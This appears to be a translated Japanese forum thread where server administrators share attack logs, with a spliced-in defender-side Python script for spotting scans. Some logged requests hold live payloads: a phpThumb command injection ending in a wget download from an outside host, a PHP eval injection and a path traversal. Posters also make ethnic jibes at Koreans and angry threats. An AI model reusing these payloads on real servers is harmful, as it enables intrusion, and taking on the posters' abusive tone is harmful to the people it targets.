79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
They attack like this, changing the parameters each time.
Attacks from the same IP have been going on for about a week now; a reverse lookup gives backup01.xsltel.me

>103 If you've identified it, just block it and be done with it...
This thread is for sharing information, though: you post the URIs and circumstances of those top attackers so that everyone can use them as a reference.

# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2
# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2
# grep 222.229.65.227 auth.log|wc
1846 25606 185870
# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227
Hang in there, admin~.

Got attacked three times, yesterday and today, from the same provider.
114.51.19.152

I keep getting attacked every day by some piece of trash who appears to be the same person.
94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"

I looked up the country and apparently it's France; some French brat, maybe.
I'll kill you, damn it.
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7

>>115 The whois info says "dedicated server", so it's probably a rented server or something like that.
Also, given that it is trying to execute commands on the server by exploiting a vulnerability in the tool called phpThumb(), the server in question has probably been taken over.

78.46.89.6 (liventura-grid.com)
2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
Followed by a hundred-odd more, mainly pma-related.

>>119 I was wondering who on earth (doko no doitsu) would go poking at security holes, and it turned out to be Germany (Doitsu).

One of these showed up for the first time in a while.
184.105.65.228 guardlayer.com

>>121 I'm getting the same thing here too, at around 13:00 and 20:00.

175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
What is this? Scary.

Korea (´・д・`) ugh

Part of a flood of requests from Google.
It seems to be something other than the search bot.
74.125.56.33

70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
So persistent.

Stop the vandalism.
ip:218.218.181.166 host:KYNfb-02p1-166.ppp11.odn.ad.jp UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61

>126 If it's domestic, send a complaint with logs attached to the other party's ISP. That usually settles it.
With a lenient ISP they may just issue a warning and not much changes, though.
A strict one will cut the line at the first complaint, but I wonder how odn handles it…

"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
There were 8,000 lines of this. Every few seconds, for 16 hours...

64.27.15.56, USA, unassigned.calpop.com
It attacks my mail server.

116.126.87.154, South Korea
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1
Plus 137 other kinds of attack.

???
Port scan and cracking-tool run from inside Japan.
49.252.168.148 EM49-252-168-148.pool.e-mobile.ne.jp.

217.41.19.142
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142,
lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx

[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql

Of the ones coming from inside Japan, a lot are on OCN; I wonder if there's a reason for that?
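A defender-side way to pick the admin-panel probe bursts posted in this thread out of an Apache combined access log; this is an added example, not code from any poster. The sample lines are constructed (documentation-range addresses), and the path patterns, 60-second window and five-path threshold are assumptions to tune.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format. Quoted fields may hold backslash escapes such as
# \x16 or \" when the client sent raw bytes instead of an HTTP request line.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+'
    r'(?: ' + QUOTED + ' ' + QUOTED + r')?')
REQ_RE = re.compile(r'^[A-Z]+ (\S+) HTTP/\d\.\d$')
# Assumed pattern list, built from path fragments seen in the thread's logs.
PROBE_RE = re.compile(
    r'my-?admin|/pma\d*/|mysql|websql|sqlweb|/scripts/setup\.php$'
    r'|w00tw00t|muieblackcat', re.IGNORECASE)


def parse_line(line):
    """Return (ip, time, path or None, status, user_agent); None if unparseable."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ip, ts, request, status, _referer, agent = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    req = REQ_RE.match(request)
    path = None  # stays None when the request line was not HTTP at all
    if req:
        # Drop the query string and collapse "//" so "//pma/x" equals "/pma/x".
        path = re.sub(r"/{2,}", "/", req.group(1).split("?", 1)[0])
    return ip, when, path, int(status), agent or "-"


def find_scanners(lines, window=timedelta(seconds=60), min_distinct=5):
    """Flag clients that request at least min_distinct different admin-panel
    paths, all refused with 4xx/5xx, inside one sliding time window."""
    refused = defaultdict(list)   # ip -> [(time, path)] answered 4xx/5xx
    answered = defaultdict(set)   # ip -> probe paths answered 2xx/3xx
    agents = defaultdict(set)     # ip -> user agents seen on probe requests
    non_http = defaultdict(int)   # ip -> count of non-HTTP request lines
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, path, status, agent = rec
        if path is None:
            non_http[ip] += 1
        elif PROBE_RE.search(path):
            agents[ip].add(agent)
            if status >= 400:
                refused[ip].append((when, path))
            else:
                answered[ip].add(path)
    findings = {}
    for ip, hits in refused.items():
        hits.sort()
        start, best = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({p for _, p in hits[start:end + 1]}))
        if best >= min_distinct:
            findings[ip] = {
                "distinct_paths": best,
                "first_seen": hits[0][0],
                "last_seen": hits[-1][0],
                # A probe that got 2xx/3xx means the path exists: review first.
                "answered": sorted(answered[ip]),
                "user_agents": sorted(agents[ip]),
            }
    return findings, dict(non_http)


# Constructed sample input, shaped like the log excerpts in the thread.
SAMPLE_LOG = r'''
203.0.113.7 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.9.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
203.0.113.7 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
203.0.113.7 - - [30/Jul/2011:23:35:26 +0900] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
203.0.113.7 - - [30/Jul/2011:23:35:27 +0900] "GET //pma2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
203.0.113.7 - - [30/Jul/2011:23:35:27 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
203.0.113.7 - - [30/Jul/2011:23:35:28 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 200 4312 "-" "-"
198.51.100.20 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
198.51.100.20 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
198.51.100.20 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
198.51.100.20 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
198.51.100.20 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
192.0.2.50 - - [07/Feb/2013:20:45:00 +0900] "GET / HTTP/1.1" 200 5184 "-" "Mozilla/5.0"
192.0.2.50 - - [07/Feb/2013:20:45:30 +0900] "GET /phpmyadmin/ HTTP/1.1" 404 228 "-" "Mozilla/5.0"
192.0.2.99 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
192.0.2.99 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
'''

if __name__ == "__main__":
    found, raw = find_scanners(SAMPLE_LOG.strip().splitlines())
    for ip, info in found.items():
        print(ip, info["distinct_paths"], info["answered"], info["user_agents"])
    print("non-HTTP request lines:", raw)
```

Byte-string request lines such as `"\x16\x03\x01"` are counted separately rather than as probes: they are what a plain-HTTP port logs when a client opens with a TLS handshake.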
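Got hit by a DDoS from a mysterious ISP called YokozunaNET.

These keep trying to break in on port 22:
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp

ssh (dd_ssh) attack
1.33.202.193 el-labo-s1.el-labo.jp

So this thread still exists.
For ssh countermeasures, if you just run denyhosts it collects them for you automatically.
With purge_deny=1y set, it collected this many for me.
% egrep ^sshd /etc/hosts.deny | wc -l
968

218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-

>>141 This guy's an idiot.
He says "this many" without even stating the time period.

It must be summer.
You could at least look up what purge_deny=1y means before posting.

I don't think that's what he meant.

Summer indeed. Is there nobody here but cranks?

2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"

It purges after one year, so obviously that's one year's worth of collection... good grief.

203.91.121.70
It brute-forces ssh on my server more than ten thousand times every day.
Kind of scary.

>>148 You're not the only one who thinks so
ttp://ip-address-lookup-v4.com/ip/203.91.121.70

58.183.165.251 is running a server for exchanging illegal material.
http://awabi.2ch.net/test/read.cgi/download/1347785389/
In this thread, ID:SLuCn6vK0 is running wild, exposing women and children and posting a storm of slander.

>150 If it's illegal, go to the police!
National Police Agency: list of cybercrime consultation desks at prefectural police headquarters
http://www.npa.go.jp/cyber/soudan.htm

>>152 These guys?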
12.7.145.50 12.71.117.172 12.238.210.67 24.39.213.154 24.97.64.230 24.103.52.22 24.123.56.246 24.186.3.95 24.234.155.80 50.75.160.114, 63.238.5.66 68.15.108.58 68.16.48.68 65.40.186.170 66.134.197.178 67.52.184.130 67.76.162.45 67.112.239.113 70.43.109.131 70.60.238.70 72.89.191.60 70.255.147.109 108.64.133.67 108.71.19.30 108.162.17.130 173.12.143.130 173.44.136.74 173.162.218.11 173.200.3.25 209.132.232.92 209.166.158.116 216.1.42.19
Each of the IPs above hit my mail server several times in quick succession.
[Partial excerpt]
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
They were coming in at a tremendous rate, changing the username each time.

66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 -
- [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-"
There's no MyAdmin here, idiot.

pma attacks come in all the time, don't they.
I'm fine because I put my birthday in the directory name.

126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
Searching for softbank126009120142.bbtec.net turns up a huge number of hits, so it's probably coming through a stepping-stone host.

192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3)
Gecko/20090309 Firefox/3.5.3"
46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-"

Stop hammering F5, you scum!!
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144

softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403
softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403
softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403
softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:46 error 403

ssh from 27.102.192.140
/var/log/auth.log
Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth]
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown
Aug 26
06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388)
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password
Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2
Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth]

F5-hammering lunatic

Enough already, you scum!!
Don't ever come back!!

The F5 hammering is annoying

Get lost, you scum!!
You're in the way!!

Get lost, you scum!!
You're in the way!!
Damn Korean blog vandal

Don't access my site with stupid query strings attached, scum!!

IP address 112.216.76.110
Friday, 8 November 2013: 5,972 unauthorized access attempts against my SMTP server in just under an hour

What do you mean, a mistake?
The username and password were being changed at random, so it must be a brute-force script.

Don't come here, you scum!!

Again today, on a certain blog that bashes Koreans,
a Korean on the Willcom provider is going berserk.
I think it's about time I reported him.

I'm exposing the IP.

Hey you, stop snooping around!!

Who are you calling unpopular? My blog has a PageRank of 4.
Don't underestimate me!!
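>>188 If all it says is SMTP, anyone would assume it was mail-forwarding retries

IP address: 162.210.196.165
Hostname: No corresponding hostname.
Country of IP allocation: United States ( us )
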